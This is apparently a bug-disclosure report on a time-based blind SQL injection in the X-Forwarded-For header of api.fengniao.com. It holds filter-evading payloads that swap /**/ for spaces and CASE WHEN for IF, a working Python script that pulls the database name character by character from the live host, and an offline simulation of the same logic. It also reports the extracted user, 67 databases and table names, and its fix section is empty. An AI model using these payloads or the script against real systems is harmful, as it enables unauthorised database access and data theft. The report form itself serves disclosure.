SQL injection in the official fengniao.com app (reaches 67 databases; verification script attached)
Looking for an sqlmap tamper script that gets past the IF filter ~
Target: the official api.fengniao.com
Injection point: the X-Forwarded-For request header (time-based blind injection)
GET http://api.fengniao.com/app_ipad/news_list.php HTTP/1.1
Accept-Encoding: gzip,deflate
X-Forwarded-For: 1
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Host: api.fengniao.com
Because the site filters spaces, commas, IF and similar, sqlmap gets nowhere ...... so the only option is to script it in Python. First, work out the payload by hand: /**/ stands in for every space, and CASE WHEN ... THEN ... ELSE ... END replaces IF, which also removes the commas that IF(cond, a, b) would need, while SLEEP() takes a single argument:
'/**/AND/**/(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(CASE/**/WHEN/**/1=1/**/THEN/**/3/**/else/**/0/**/END)))nKfJ)/**/AND/**/'zyYm'='zyYm
From here on, only the 1=1 has to be replaced with the condition to test. The verification script follows (it extracts the current database name as the example; change the proxy address in the script before testing). A response that takes longer than 3 seconds means the LIKE prefix matched; each hit is requested a second time so that a single slow response from the network is not mistaken for SLEEP(3):
#!/usr/bin/env python3
# coding=utf8
# Time-based blind extraction of database() through the X-Forwarded-For header.
# Requests go through a local intercepting proxy (192.168.222.202:8080); change it to your own.
import http.client
import time

database = ''        # characters recovered so far
temp_database = ''   # the same characters as hex, used as the LIKE prefix in the payload
httpClient = None
count = 0            # 1 = a hit is waiting for confirmation by a second request
i = 33               # scan printable ASCII 33..127 for the next character
while i < 128:
    # '%' (0x25) is the LIKE wildcard and would match anything, so skip it.
    # '_' (0x5f) is also a wildcard, but it is reached only after digits and letters
    # (LIKE is case-insensitive, so 'A' at 65 already matches a lowercase 'a'),
    # so in practice it only fires when the real character is an underscore.
    if i == 37:
        i = i + 1
    try:
        headers = {
            "Host": "api.fengniao.com",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
            "Accept-Encoding": "gzip,deflate",
            # database() LIKE 0x<prefix><candidate>25 -> SLEEP(3) when the prefix matches
            "X-Forwarded-For": "'/**/AND/**/(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(CASE/**/WHEN/**/(database()/**/like/**/0x" + temp_database + str(hex(i))[2:] + "25)/**/THEN/**/3/**/else/**/0/**/END)))nKfJ)/**/AND/**/'zyYm'='zyYm",
            "Accept": "*/*",
            "Connection": "close",
        }
        httpClient = http.client.HTTPConnection("192.168.222.202", 8080, timeout=30)
        url = 'http://api.fengniao.com/app_ipad/news_list.php'
        httpClient.request("GET", url=url, headers=headers)
        st = time.time()
        response = httpClient.getresponse()
        rp = response.read()
        if count == 1:
            # second request for the same candidate: accept it only if it is slow again
            if time.time() - st > 3:
                temp_database = temp_database + str(hex(i))[2:]
                database = database + chr(i)
                print('database(): ', database)
                i = 33          # start the scan over for the next position
                count = 0
            else:
                count = 0       # the first delay was network jitter; move on
        elif time.time() - st > 3:
            count = 1           # possible hit: repeat this candidate once to confirm
            i = i - 1
        i = i + 1
    except Exception as e:
        print(e)
    finally:
        if httpClient:
            httpClient.close()
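The extraction loop can be exercised without touching the target. What follows is an added example, not the report's script: it rebuilds the same payload and the same LIKE-prefix search with double confirmation, but runs it against a constructed local stand-in (FakeTarget, with a made-up database name) that returns the number of seconds SLEEP() would have taken instead of sleeping. It goes one step beyond the script in one respect: the LIKE metacharacters % and _ are escaped with MySQL's default backslash ESCAPE character rather than skipped, so a name containing an underscore is recovered as itself. Everything except the payload string is an assumption made for this example.

```python
# Added example, not the report's code. SECRET, FakeTarget and mysql_like are
# constructed stand-ins so the search runs offline; only the payload text is the report's.

SECRET = "fengniao_db"  # constructed value standing in for the remote database()


def build_payload(hex_prefix):
    """The report's filter-evading payload: /**/ for spaces, CASE WHEN instead of IF().

    hex_prefix is the hex of the LIKE pattern so far; the trailing 25 is the '%' wildcard.
    """
    return (
        "'/**/AND/**/(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(CASE/**/WHEN/**/"
        "(database()/**/like/**/0x" + hex_prefix + "25)/**/THEN/**/3/**/else/**/0/**/END)))nKfJ)"
        "/**/AND/**/'zyYm'='zyYm"
    )


def like_escape(text):
    """Escape LIKE metacharacters with MySQL's default ESCAPE character, the backslash."""
    return "".join("\\" + ch if ch in "%_\\" else ch for ch in text)


def mysql_like(value, pattern):
    """Minimal MySQL LIKE: '%' any run, '_' one char, backslash escapes, case-insensitive."""
    v, p = value.lower(), pattern.lower()

    def match(i, j):
        if j == len(p):
            return i == len(v)
        ch = p[j]
        if ch == "\\" and j + 1 < len(p):  # escaped metacharacter: match it literally
            return i < len(v) and v[i] == p[j + 1] and match(i + 1, j + 2)
        if ch == "%":
            return any(match(k, j + 1) for k in range(i, len(v) + 1))
        if i < len(v) and (ch == "_" or ch == v[i]):
            return match(i + 1, j + 1)
        return False

    return match(0, 0)


class FakeTarget:
    """Constructed stand-in for api.fengniao.com: reports the SLEEP() seconds the
    payload would trigger instead of sleeping, and counts the requests made."""

    def __init__(self, secret=SECRET):
        self.secret = secret
        self.requests = 0

    def seconds(self, hex_prefix):
        self.requests += 1
        pattern = bytes.fromhex(hex_prefix + "25").decode("latin-1")
        return 3.0 if mysql_like(self.secret, pattern) else 0.0


def extract(oracle, threshold=3.0, max_len=64):
    """Recover database() one character at a time from a timing oracle.

    oracle(hex_prefix) returns the observed delay for the payload built from that
    prefix. A reading at or above threshold means the LIKE matched; each hit is
    queried a second time, as the report's script does, before it is accepted.
    """
    found = ""
    while len(found) < max_len:
        hit = None
        for c in range(33, 128):
            probe = like_escape(found + chr(c)).encode().hex()
            if oracle(probe) >= threshold and oracle(probe) >= threshold:
                hit = chr(c)
                break
        if hit is None:
            break  # no candidate extends the prefix: the value is complete
        found += hit
    return found


if __name__ == "__main__":
    target = FakeTarget()
    print(build_payload(like_escape("f").encode().hex()))
    print(extract(target.seconds), "in", target.requests, "requests")
```

Because LIKE is case-insensitive under the default collation, the ascending scan reaches 'F' (0x46) before 'f' (0x66) and the value comes back upper-cased; recovering the real case needs a comparison against a BINARY value. Confirmation costs one extra request per recovered character, so the total is roughly one request per rejected candidate plus two per character.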
1. Extracted the current database user
2. Extracted the current database name
3. Extracted the database names: 67 in total. The payload used to confirm the count is:
'/**/AND/**/(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(CASE/**/WHEN/**/((select/**/count(*)/**/from/**/information_schema.SCHEMATA)=67)/**/THEN/**/3/**/else/**/0/**/END)))nKfJ)/**/AND/**/'zyYm'='zyYm
Too many to dump, so only the first few were extracted ......
4. Extracted the table names of the current database; only the first two were dumped, for verification ~
Solution:
Please kindly advise ~